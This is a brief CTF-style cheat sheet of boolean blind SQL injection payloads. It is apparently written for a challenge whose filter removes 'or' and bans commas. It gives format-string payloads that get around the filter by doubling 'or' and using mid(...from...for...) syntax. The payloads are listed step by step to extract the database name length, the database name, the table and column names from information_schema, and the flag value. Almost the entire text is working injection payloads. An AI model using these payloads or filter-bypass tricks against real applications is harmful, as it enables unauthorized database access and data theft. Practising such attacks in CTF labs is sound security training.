0x01 "or" is replaced by the filter, commas cannot be used, blind injection
Database name length
"0'oorr((length(database()))=%s)oorr'0" % (x)
Database name
"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" % (x+1, y)
Table names
"0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)='ctf_sql_bool_blind')='%s')oorr'0" % (x+1, y)
Column names
"0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0" % (x+1, y)
dump
"0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0" % (x+1, y)